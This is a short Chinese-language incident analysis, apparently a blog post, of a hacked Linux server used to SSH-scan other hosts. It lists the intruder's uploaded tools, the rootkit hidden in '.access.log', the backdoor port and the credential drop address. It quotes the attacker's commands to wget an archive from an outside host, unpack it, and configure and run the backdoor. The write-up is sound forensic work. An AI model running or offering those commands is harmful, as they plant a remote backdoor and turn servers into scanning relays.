分析一台被入侵的linux服务器

superadmin

客户反映一台linux服务器老向外ssh扫描，登陆到服务器上，查看进程发现大量ssh-scan在运行，运行用户为mircte，查找ssh-scan这个文件，确定所在位置/var/log目录下

　　黑客进入服务器后所做的操作：

　　1.       向/var/tmp/下上传了两个恶意程序

　　其中wtf为向外扫描其它服务器的ssh-scan黑客软件，.access.log文件下存放有rootkit后门，服务器被当成了肉鸡跳板，开放14785端口等待入侵者连接，扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。

　　2.       入侵者登陆记录

　　85.120.78.140的IP来自罗马尼亚。

　　3.       wget ; tar zxvf wtf.jpg

　　wget adelinuangell.lx.ro/ryo.tar

　　tar xvf ryo.tar

　　cd .access.log

　　./config Ady 14785

　　./run

　　结束进程。删掉程序。。删掉用户。修改root密码。